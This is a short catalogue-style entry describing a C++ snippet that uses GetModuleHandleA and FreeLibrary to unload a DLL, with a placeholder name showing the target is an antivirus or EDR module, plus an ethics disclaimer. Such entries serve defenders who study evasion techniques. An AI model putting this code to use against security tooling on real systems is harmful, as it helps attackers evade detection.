(C++) Unloading Module with FreeLibrary by West Wind

Created the Sunday 19 March 2023. Updated 1 year ago.

Description:

This code demonstrates how the GetModuleHandleA and FreeLibrary functions can be used to unload a DLL from a process's memory.

  • GetModuleHandleA retrieves a handle to a module (such as a DLL) that is already loaded.
  • FreeLibrary frees a loaded DLL from the process's memory.

This technique can be used maliciously to unload security-related DLLs used by antivirus or EDR solutions. As such, it is important to use such code ethically and responsibly, within the bounds of the law and ethical considerations.

Code

            #include <windows.h>

int main()
{
  HMODULE hLibModule = GetModuleHandleA("av_edr_dllName.dll");
  FreeLibrary(hLibModule);
  return 0;
}